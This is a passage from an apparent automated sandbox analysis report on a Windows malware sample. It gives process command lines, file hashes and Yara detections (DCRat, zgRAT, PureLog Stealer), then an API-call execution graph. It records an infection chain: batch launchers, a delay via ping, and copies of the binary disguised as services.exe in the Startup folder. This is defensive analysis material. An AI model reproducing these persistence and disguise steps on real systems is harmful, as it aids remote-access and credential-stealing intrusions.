                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat" "
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:05:51:48
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:05:51:48
                                                          Start date:08/09/2024
                                                          Path:C:\ProviderWebSavesNet\hostcrt.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\ProviderWebSavesNet/hostcrt.exe"
                                                          Imagebase:0x610000
                                                          File size:3'879'424 bytes
                                                          MD5 hash:88340879F7B502B0EEE8F6147CDC70EB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1749800429.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1798966545.00000000130E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProviderWebSavesNet\hostcrt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProviderWebSavesNet\hostcrt.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:05:51:52
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat"
                                                          Imagebase:0x7ff6b79e0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:05:51:52
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:05:51:53
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7ad9e0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:05:51:53
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\PING.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:ping -n 10 localhost
                                                          Imagebase:0x7ff722be0000
                                                          File size:22'528 bytes
                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:05:52:02
                                                          Start date:08/09/2024
                                                          Path:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe"
                                                          Imagebase:0x730000
                                                          File size:3'879'424 bytes
                                                          MD5 hash:88340879F7B502B0EEE8F6147CDC70EB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.4164385410.0000000003213000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:12
                                                          Start time:05:52:04
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\OpenWith.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                          Imagebase:0x7ff7ed500000
                                                          File size:123'984 bytes
                                                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:05:52:11
                                                          Start date:08/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe"
                                                          Imagebase:0xbe0000
                                                          File size:3'879'424 bytes
                                                          MD5 hash:88340879F7B502B0EEE8F6147CDC70EB
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:true

                                                            Execution Graph

                                                            Execution Coverage:9.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:9.3%
                                                            Total number of Nodes:1511
                                                            Total number of Limit Nodes:40
cd4a9c 24163->24164 24165 cc7b8b 24164->24165 24170 cd0e46 80 API calls 24164->24170 24165->24117 24167->24153 24168->24156 24169->24160 24170->24165 24172 cc828e __EH_prolog 24171->24172 24200 cc13dc 24172->24200 24174 cc82aa 24175 cc82bb 24174->24175 24343 cc9f42 24174->24343 24178 cc82f2 24175->24178 24208 cc1a04 24175->24208 24339 cc1692 24178->24339 24184 cc83e8 24235 cc1f6d 24184->24235 24187 cc83f3 24187->24178 24239 cc3b2d 24187->24239 24251 cc848e 24187->24251 24189 cca56d 7 API calls 24190 cc82ee 24189->24190 24190->24178 24190->24189 24192 cc8389 24190->24192 24347 ccc0c5 CompareStringW _wcslen 24190->24347 24227 cc8430 24192->24227 24194 cca582 24193->24194 24195 cca5b0 24194->24195 24602 cca69b 24194->24602 24195->24118 24197 cca592 24197->24195 24198 cca597 FindClose 24197->24198 24198->24195 24199->24121 24201 cc13e1 __EH_prolog 24200->24201 24202 ccce40 8 API calls 24201->24202 24203 cc1419 24202->24203 24204 cdeb38 8 API calls 24203->24204 24207 cc1474 __cftof 24203->24207 24205 cc1461 24204->24205 24206 ccb505 84 API calls 24205->24206 24205->24207 24206->24207 24207->24174 24209 cc1a0e __EH_prolog 24208->24209 24221 cc1a61 24209->24221 24224 cc1b9b 24209->24224 24348 cc13ba 24209->24348 24212 cc1bc7 24360 cc138b 74 API calls 24212->24360 24214 cc3b2d 101 API calls 24217 cc1c12 24214->24217 24215 cc1bd4 24215->24214 24215->24224 24216 cc1c5a 24220 cc1c8d 24216->24220 24216->24224 24361 cc138b 74 API calls 24216->24361 24217->24216 24219 cc3b2d 101 API calls 24217->24219 24219->24217 24220->24224 24225 cc9e80 79 API calls 24220->24225 24221->24212 24221->24215 24221->24224 24222 cc3b2d 101 API calls 24223 cc1cde 24222->24223 24223->24222 24223->24224 24224->24190 24225->24223 24381 cccf3d 24227->24381 24229 cc8440 24385 cd13d2 GetSystemTime SystemTimeToFileTime 24229->24385 24231 cc83a3 24231->24184 24232 cd1b66 24231->24232 24390 cdde6b 24232->24390 24236 cc1f72 __EH_prolog 24235->24236 24238 cc1fa6 24236->24238 24398 cc19af 24236->24398 
24238->24187 24240 cc3b3d 24239->24240 24241 cc3b39 24239->24241 24250 cc9e80 79 API calls 24240->24250 24241->24187 24242 cc3b4f 24243 cc3b78 24242->24243 24244 cc3b6a 24242->24244 24529 cc286b 101 API calls 3 library calls 24243->24529 24249 cc3baa 24244->24249 24528 cc32f7 89 API calls 2 library calls 24244->24528 24247 cc3b76 24247->24249 24530 cc20d7 74 API calls 24247->24530 24249->24187 24250->24242 24252 cc8498 __EH_prolog 24251->24252 24257 cc84d5 24252->24257 24262 cc8513 24252->24262 24555 cd8c8d 103 API calls 24252->24555 24253 cc84f5 24255 cc851c 24253->24255 24256 cc84fa 24253->24256 24255->24262 24557 cd8c8d 103 API calls 24255->24557 24256->24262 24556 cc7a0d 152 API calls 24256->24556 24257->24253 24259 cc857a 24257->24259 24257->24262 24259->24262 24531 cc5d1a 24259->24531 24262->24187 24263 cc8605 24263->24262 24537 cc8167 24263->24537 24266 cc8797 24267 cca56d 7 API calls 24266->24267 24268 cc8802 24266->24268 24267->24268 24543 cc7c0d 24268->24543 24270 ccd051 82 API calls 24271 cc885d 24270->24271 24271->24262 24271->24270 24272 cc898b 24271->24272 24273 cc8992 24271->24273 24558 cc8117 84 API calls 24271->24558 24559 cc2021 74 API calls 24271->24559 24560 cc2021 74 API calls 24272->24560 24274 cc8a5f 24273->24274 24279 cc89e1 24273->24279 24278 cc8ab6 24274->24278 24292 cc8a6a 24274->24292 24277 cc8b14 24281 cc8b82 24277->24281 24327 cc9105 24277->24327 24564 cc98bc 24277->24564 24285 cc8a4c 24278->24285 24563 cc7fc0 97 API calls 24278->24563 24279->24277 24284 cca231 3 API calls 24279->24284 24279->24285 24288 ccab1a 8 API calls 24281->24288 24282 cc959a 80 API calls 24282->24262 24283 cc959a 80 API calls 24283->24262 24287 cc8a19 24284->24287 24285->24277 24286 cc8ab4 24285->24286 24286->24283 24287->24285 24561 cc92a3 97 API calls 24287->24561 24290 cc8bd1 24288->24290 24293 ccab1a 8 API calls 24290->24293 24292->24286 24562 cc7db2 101 API calls 24292->24562 24309 cc8be7 24293->24309 24297 cc8b70 24568 cc6e98 77 API calls 24297->24568 
24299 cc8d18 24302 cc8d8a 24299->24302 24303 cc8d28 24299->24303 24300 cc8e40 24304 cc8e66 24300->24304 24305 cc8e52 24300->24305 24324 cc8d49 24300->24324 24301 cc8cbc 24301->24299 24301->24300 24310 cc8167 19 API calls 24302->24310 24306 cc8d6e 24303->24306 24315 cc8d37 24303->24315 24308 cd3377 75 API calls 24304->24308 24307 cc9215 123 API calls 24305->24307 24306->24324 24571 cc77b8 111 API calls 24306->24571 24307->24324 24311 cc8e7f 24308->24311 24309->24301 24312 cc8c93 24309->24312 24318 cc981a 79 API calls 24309->24318 24314 cc8dbd 24310->24314 24574 cd3020 123 API calls 24311->24574 24312->24301 24569 cc9a3c 82 API calls 24312->24569 24320 cc8df5 24314->24320 24321 cc8de6 24314->24321 24314->24324 24570 cc2021 74 API calls 24315->24570 24318->24312 24573 cc9155 93 API calls __EH_prolog 24320->24573 24572 cc7542 85 API calls 24321->24572 24330 cc8f85 24324->24330 24575 cc2021 74 API calls 24324->24575 24326 cc9090 24326->24327 24328 cca4ed 3 API calls 24326->24328 24327->24282 24331 cc90eb 24328->24331 24329 cc903e 24550 cc9da2 24329->24550 24330->24326 24330->24327 24330->24329 24549 cc9f09 SetEndOfFile 24330->24549 24331->24327 24576 cc2021 74 API calls 24331->24576 24334 cc9085 24336 cc9620 77 API calls 24334->24336 24336->24326 24337 cc90fb 24577 cc6dcb 76 API calls 24337->24577 24340 cc16a4 24339->24340 24593 cccee1 24340->24593 24344 cc9f59 24343->24344 24346 cc9f63 24344->24346 24601 cc6d0c 78 API calls 24344->24601 24346->24175 24347->24190 24362 cc1732 24348->24362 24350 cc13d6 24351 cc9e80 24350->24351 24352 cc9e92 24351->24352 24353 cc9ea5 24351->24353 24354 cc9eb0 24352->24354 24379 cc6d5b 77 API calls 24352->24379 24353->24354 24356 cc9eb8 SetFilePointer 24353->24356 24354->24221 24356->24354 24357 cc9ed4 GetLastError 24356->24357 24357->24354 24358 cc9ede 24357->24358 24358->24354 24380 cc6d5b 77 API calls 24358->24380 24360->24224 24361->24220 24363 cc1748 24362->24363 24374 cc17a0 __InternalCxxFrameHandler 24362->24374 24364 cc1771 
24363->24364 24375 cc6c36 76 API calls __vswprintf_c_l 24363->24375 24366 cc17c7 24364->24366 24369 cc178d ___std_exception_copy 24364->24369 24368 ce3e3e 22 API calls 24366->24368 24367 cc1767 24376 cc6ca7 75 API calls 24367->24376 24371 cc17ce 24368->24371 24369->24374 24377 cc6ca7 75 API calls 24369->24377 24371->24374 24378 cc6ca7 75 API calls 24371->24378 24374->24350 24375->24367 24376->24364 24377->24374 24378->24374 24379->24353 24380->24354 24382 cccf4d 24381->24382 24384 cccf54 24381->24384 24386 cc981a 24382->24386 24384->24229 24385->24231 24387 cc9833 24386->24387 24389 cc9e80 79 API calls 24387->24389 24388 cc9865 24388->24384 24389->24388 24391 cdde78 24390->24391 24392 cce617 53 API calls 24391->24392 24393 cdde9b 24392->24393 24394 cc4092 _swprintf 51 API calls 24393->24394 24395 cddead 24394->24395 24396 cdd4d4 16 API calls 24395->24396 24397 cd1b7c 24396->24397 24397->24184 24399 cc19bf 24398->24399 24401 cc19bb 24398->24401 24402 cc18f6 24399->24402 24401->24238 24403 cc1908 24402->24403 24404 cc1945 24402->24404 24405 cc3b2d 101 API calls 24403->24405 24410 cc3fa3 24404->24410 24408 cc1928 24405->24408 24408->24401 24413 cc3fac 24410->24413 24411 cc3b2d 101 API calls 24411->24413 24412 cc1966 24412->24408 24415 cc1e50 24412->24415 24413->24411 24413->24412 24427 cd0e08 24413->24427 24416 cc1e5a __EH_prolog 24415->24416 24435 cc3bba 24416->24435 24418 cc1e84 24419 cc1732 78 API calls 24418->24419 24422 cc1f0b 24418->24422 24420 cc1e9b 24419->24420 24463 cc18a9 78 API calls 24420->24463 24422->24408 24423 cc1eb3 24425 cc1ebf _wcslen 24423->24425 24464 cd1b84 MultiByteToWideChar 24423->24464 24465 cc18a9 78 API calls 24425->24465 24428 cd0e0f 24427->24428 24429 cd0e2a 24428->24429 24433 cc6c31 RaiseException _com_raise_error 24428->24433 24430 cd0e3b SetThreadExecutionState 24429->24430 24434 cc6c31 RaiseException _com_raise_error 24429->24434 24430->24413 24433->24429 24434->24430 24436 cc3bc4 __EH_prolog 24435->24436 24437 cc3bda 24436->24437 
24438 cc3bf6 24436->24438 24491 cc138b 74 API calls 24437->24491 24439 cc3e51 24438->24439 24443 cc3c22 24438->24443 24508 cc138b 74 API calls 24439->24508 24442 cc3be5 24442->24418 24443->24442 24466 cd3377 24443->24466 24445 cc3ca3 24447 cc3d2e 24445->24447 24462 cc3c9a 24445->24462 24494 ccd051 24445->24494 24446 cc3c9f 24446->24445 24493 cc20bd 78 API calls 24446->24493 24476 ccab1a 24447->24476 24449 cc3c8f 24492 cc138b 74 API calls 24449->24492 24450 cc3c71 24450->24445 24450->24446 24450->24449 24451 cc3d41 24456 cc3dd7 24451->24456 24457 cc3dc7 24451->24457 24500 cd3020 123 API calls 24456->24500 24480 cc9215 24457->24480 24460 cc3dd5 24460->24462 24501 cc2021 74 API calls 24460->24501 24502 cd2297 24462->24502 24463->24423 24464->24425 24465->24422 24467 cd338c 24466->24467 24469 cd3396 ___std_exception_copy 24466->24469 24509 cc6ca7 75 API calls 24467->24509 24470 cd341c 24469->24470 24471 cd3440 __cftof 24469->24471 24472 cd34c6 24469->24472 24510 cd32aa 75 API calls 3 library calls 24470->24510 24471->24450 24511 ce238d RaiseException 24472->24511 24475 cd34f2 24477 ccab28 24476->24477 24479 ccab32 24476->24479 24478 cdeb38 8 API calls 24477->24478 24478->24479 24479->24451 24481 cc921f __EH_prolog 24480->24481 24512 cc7c64 24481->24512 24484 cc13ba 78 API calls 24485 cc9231 24484->24485 24515 ccd114 24485->24515 24487 cc928a 24487->24460 24489 ccd114 118 API calls 24490 cc9243 24489->24490 24490->24487 24490->24489 24524 ccd300 97 API calls __InternalCxxFrameHandler 24490->24524 24491->24442 24492->24462 24493->24445 24495 ccd084 24494->24495 24496 ccd072 24494->24496 24526 cc603a 82 API calls 24495->24526 24525 cc603a 82 API calls 24496->24525 24499 ccd07c 24499->24447 24500->24460 24501->24462 24503 cd22a1 24502->24503 24504 cd22ba 24503->24504 24507 cd22ce 24503->24507 24527 cd0eed 86 API calls 24504->24527 24506 cd22c1 24506->24507 24508->24442 24509->24469 24510->24471 24511->24475 24513 ccb146 GetVersionExW 24512->24513 24514 cc7c69 24513->24514 
24514->24484 24521 ccd12a __InternalCxxFrameHandler 24515->24521 24516 ccd29a 24517 ccd2ce 24516->24517 24518 ccd0cb 6 API calls 24516->24518 24519 cd0e08 SetThreadExecutionState RaiseException 24517->24519 24518->24517 24522 ccd291 24519->24522 24520 cd8c8d 103 API calls 24520->24521 24521->24516 24521->24520 24521->24522 24523 ccac05 91 API calls 24521->24523 24522->24490 24523->24521 24524->24490 24525->24499 24526->24499 24527->24506 24528->24247 24529->24247 24530->24249 24532 cc5d2a 24531->24532 24578 cc5c4b 24532->24578 24534 cc5d95 24534->24263 24536 cc5d5d 24536->24534 24583 ccb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24536->24583 24538 cc8186 24537->24538 24539 cc8232 24538->24539 24590 ccbe5e 19 API calls __InternalCxxFrameHandler 24538->24590 24589 cd1fac CharUpperW 24539->24589 24542 cc823b 24542->24266 24544 cc7c22 24543->24544 24545 cc7c5a 24544->24545 24591 cc6e7a 74 API calls 24544->24591 24545->24271 24547 cc7c52 24592 cc138b 74 API calls 24547->24592 24549->24329 24551 cc9db3 24550->24551 24554 cc9dc2 24550->24554 24552 cc9db9 FlushFileBuffers 24551->24552 24551->24554 24552->24554 24553 cc9e3f SetFileTime 24553->24334 24554->24553 24555->24257 24556->24262 24557->24262 24558->24271 24559->24271 24560->24273 24561->24285 24562->24286 24563->24285 24565 cc98c5 GetFileType 24564->24565 24566 cc8b5a 24564->24566 24565->24566 24566->24281 24567 cc2021 74 API calls 24566->24567 24567->24297 24568->24281 24569->24301 24570->24324 24571->24324 24572->24324 24573->24324 24574->24324 24575->24330 24576->24337 24577->24327 24584 cc5b48 24578->24584 24580 cc5c6c 24580->24536 24582 cc5b48 2 API calls 24582->24580 24583->24536 24587 cc5b52 24584->24587 24585 cc5c3a 24585->24580 24585->24582 24587->24585 24588 ccb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24587->24588 24588->24587 24589->24542 24590->24539 24591->24547 24592->24545 24594 cccef2 24593->24594 24599 cca99e 86 API calls 24594->24599 24596 cccf24 24600 cca99e 86 API 
calls 24596->24600 24598 cccf2f 24599->24596 24600->24598 24601->24346 24603 cca6a8 24602->24603 24604 cca727 FindNextFileW 24603->24604 24605 cca6c1 FindFirstFileW 24603->24605 24606 cca732 GetLastError 24604->24606 24612 cca709 24604->24612 24607 cca6d0 24605->24607 24605->24612 24606->24612 24608 ccbb03 GetCurrentDirectoryW 24607->24608 24609 cca6e0 24608->24609 24610 cca6fe GetLastError 24609->24610 24611 cca6e4 FindFirstFileW 24609->24611 24610->24612 24611->24610 24611->24612 24612->24197 24622 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24613->24622 24615 cda5cd 24616 cda5d9 24615->24616 24623 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24615->24623 24616->23995 24616->23996 24618->24002 24619->24005 24620->24005 24621->24008 24622->24615 24623->24616 24624->24015 24626 cc9f42 78 API calls 24625->24626 24627 cc1fe8 24626->24627 24628 cc2005 24627->24628 24629 cc1a04 101 API calls 24627->24629 24628->24024 24628->24025 24630 cc1ff5 24629->24630 24630->24628 24632 cc138b 74 API calls 24630->24632 24632->24628 24633 cc13e1 84 API calls 2 library calls 25346 cd94e0 GetClientRect 25382 cd21e0 26 API calls std::bad_exception::bad_exception 25409 cdf2e0 46 API calls __RTC_Initialize 25410 cebee0 GetCommandLineA GetCommandLineW 25347 ce2cfb 38 API calls 4 library calls 25383 cc95f0 80 API calls 25384 cdfd4f 9 API calls 2 library calls 25411 cc5ef0 82 API calls 24656 ce98f0 24664 ceadaf 24656->24664 24660 ce990c 24661 ce9919 24660->24661 24672 ce9920 11 API calls 24660->24672 24663 ce9904 24673 ceac98 24664->24673 24667 ceadee TlsAlloc 24668 ceaddf 24667->24668 24669 cdfbbc CatchGuardHandler 5 API calls 24668->24669 24670 ce98fa 24669->24670 24670->24663 24671 ce9869 20 API calls 2 library calls 24670->24671 24671->24660 24672->24663 24674 ceacc8 24673->24674 24678 ceacc4 24673->24678 24674->24667 24674->24668 24675 ceace8 24675->24674 24677 ceacf4 GetProcAddress 24675->24677 24679 cead04 __dosmaperr 24677->24679 24678->24674 24678->24675 24680 cead34 
24678->24680 24679->24674 24681 cead4a 24680->24681 24682 cead55 LoadLibraryExW 24680->24682 24681->24678 24683 cead8a 24682->24683 24684 cead72 GetLastError 24682->24684 24683->24681 24686 ceada1 FreeLibrary 24683->24686 24684->24683 24685 cead7d LoadLibraryExW 24684->24685 24685->24683 24686->24681 24688 ceabf0 24690 ceabfb 24688->24690 24691 ceac24 24690->24691 24693 ceac20 24690->24693 24694 ceaf0a 24690->24694 24701 ceac50 DeleteCriticalSection 24691->24701 24695 ceac98 __dosmaperr 5 API calls 24694->24695 24696 ceaf31 24695->24696 24697 ceaf4f InitializeCriticalSectionAndSpinCount 24696->24697 24698 ceaf3a 24696->24698 24697->24698 24699 cdfbbc CatchGuardHandler 5 API calls 24698->24699 24700 ceaf66 24699->24700 24700->24690 24701->24693 25349 ce88f0 7 API calls ___scrt_uninitialize_crt 25386 cdb18d 78 API calls 25350 cdc793 97 API calls 4 library calls 25412 cdc793 102 API calls 4 library calls 25388 cd9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25352 ceb49d 6 API calls CatchGuardHandler 25428 cc6faa 111 API calls 3 library calls 25390 cdeda7 48 API calls _unexpected 25354 cddca1 DialogBoxParamW 25429 cdf3a0 27 API calls 25357 cea4a0 71 API calls _free 25358 cf08a0 IsProcessorFeaturePresent 25430 cd1bbd GetCPInfo IsDBCSLeadByte 25391 cdb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24855 cdf3b2 24856 cdf3be ___scrt_is_nonwritable_in_current_image 24855->24856 24887 cdeed7 24856->24887 24858 cdf3c5 24859 cdf518 24858->24859 24862 cdf3ef 24858->24862 24960 cdf838 4 API calls 2 library calls 24859->24960 24861 cdf51f 24953 ce7f58 24861->24953 24864 cdf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24862->24864 24898 ce8aed 24862->24898 24872 cdf48f 24864->24872 24956 ce7af4 38 API calls 3 library calls 24864->24956 24870 cdf40e 24906 cdf953 GetStartupInfoW __cftof 24872->24906 24874 cdf495 24907 ce8a3e 51 API calls 24874->24907 24877 cdf49d 24908 cddf1e 24877->24908 24881 cdf4b1 24881->24861 
24882 cdf4b5 24881->24882 24883 cdf4be 24882->24883 24958 ce7efb 28 API calls _abort 24882->24958 24959 cdf048 12 API calls ___scrt_uninitialize_crt 24883->24959 24886 cdf4c6 24886->24870 24888 cdeee0 24887->24888 24962 cdf654 IsProcessorFeaturePresent 24888->24962 24890 cdeeec 24963 ce2a5e 24890->24963 24892 cdeef1 24893 cdeef5 24892->24893 24971 ce8977 24892->24971 24893->24858 24896 cdef0c 24896->24858 24899 ce8b04 24898->24899 24900 cdfbbc CatchGuardHandler 5 API calls 24899->24900 24901 cdf408 24900->24901 24901->24870 24902 ce8a91 24901->24902 24904 ce8ac0 24902->24904 24903 cdfbbc CatchGuardHandler 5 API calls 24905 ce8ae9 24903->24905 24904->24903 24905->24864 24906->24874 24907->24877 25064 cd0863 24908->25064 24912 cddf3d 25113 cdac16 24912->25113 24914 cddf46 __cftof 24915 cddf59 GetCommandLineW 24914->24915 24916 cddf68 24915->24916 24917 cddfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24915->24917 25117 cdc5c4 24916->25117 24918 cc4092 _swprintf 51 API calls 24917->24918 24920 cde04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24918->24920 25128 cdb6dd LoadBitmapW 24920->25128 24923 cddf76 OpenFileMappingW 24927 cddf8f MapViewOfFile 24923->24927 24928 cddfd6 CloseHandle 24923->24928 24924 cddfe0 25122 cddbde 24924->25122 24929 cddfcd UnmapViewOfFile 24927->24929 24930 cddfa0 __InternalCxxFrameHandler 24927->24930 24928->24917 24929->24928 24935 cddbde 2 API calls 24930->24935 24937 cddfbc 24935->24937 24936 cd90b7 8 API calls 24938 cde0aa DialogBoxParamW 24936->24938 24937->24929 24939 cde0e4 24938->24939 24940 cde0fd 24939->24940 24941 cde0f6 Sleep 24939->24941 24943 cde10b 24940->24943 25158 cdae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24940->25158 24941->24940 24944 cde12a DeleteObject 24943->24944 24945 cde13f DeleteObject 24944->24945 24948 cde146 24944->24948 24945->24948 24946 cde189 25155 cdac7c 24946->25155 24947 cde177 25159 cddc3b 6 API calls 24947->25159 24948->24946 24948->24947 24951 cde17d CloseHandle 
24951->24946 24952 cde1c3 24957 cdf993 GetModuleHandleW 24952->24957 25289 ce7cd5 24953->25289 24956->24872 24957->24881 24958->24883 24959->24886 24960->24861 24962->24890 24975 ce3b07 24963->24975 24967 ce2a6f 24968 ce2a7a 24967->24968 24989 ce3b43 DeleteCriticalSection 24967->24989 24968->24892 24970 ce2a67 24970->24892 25018 cec05a 24971->25018 24974 ce2a7d 7 API calls 2 library calls 24974->24893 24976 ce3b10 24975->24976 24978 ce3b39 24976->24978 24979 ce2a63 24976->24979 24990 ce3d46 24976->24990 24995 ce3b43 DeleteCriticalSection 24978->24995 24979->24970 24981 ce2b8c 24979->24981 25011 ce3c57 24981->25011 24984 ce2ba1 24984->24967 24986 ce2baf 24987 ce2bbc 24986->24987 25017 ce2bbf 6 API calls ___vcrt_FlsFree 24986->25017 24987->24967 24989->24970 24996 ce3c0d 24990->24996 24993 ce3d7e InitializeCriticalSectionAndSpinCount 24994 ce3d69 24993->24994 24994->24976 24995->24979 24997 ce3c26 24996->24997 24998 ce3c4f 24996->24998 24997->24998 25003 ce3b72 24997->25003 24998->24993 24998->24994 25001 ce3c3b GetProcAddress 25001->24998 25002 ce3c49 25001->25002 25002->24998 25008 ce3b7e ___vcrt_FlsSetValue 25003->25008 25004 ce3bf3 25004->24998 25004->25001 25005 ce3b95 LoadLibraryExW 25006 ce3bfa 25005->25006 25007 ce3bb3 GetLastError 25005->25007 25006->25004 25009 ce3c02 FreeLibrary 25006->25009 25007->25008 25008->25004 25008->25005 25010 ce3bd5 LoadLibraryExW 25008->25010 25009->25004 25010->25006 25010->25008 25012 ce3c0d ___vcrt_FlsSetValue 5 API calls 25011->25012 25013 ce3c71 25012->25013 25014 ce3c8a TlsAlloc 25013->25014 25015 ce2b96 25013->25015 25015->24984 25016 ce3d08 6 API calls ___vcrt_FlsSetValue 25015->25016 25016->24986 25017->24984 25019 cec077 25018->25019 25022 cec073 25018->25022 25019->25022 25024 cea6a0 25019->25024 25020 cdfbbc CatchGuardHandler 5 API calls 25021 cdeefe 25020->25021 25021->24896 25021->24974 25022->25020 25025 cea6ac ___scrt_is_nonwritable_in_current_image 25024->25025 25036 ceac31 EnterCriticalSection 25025->25036 
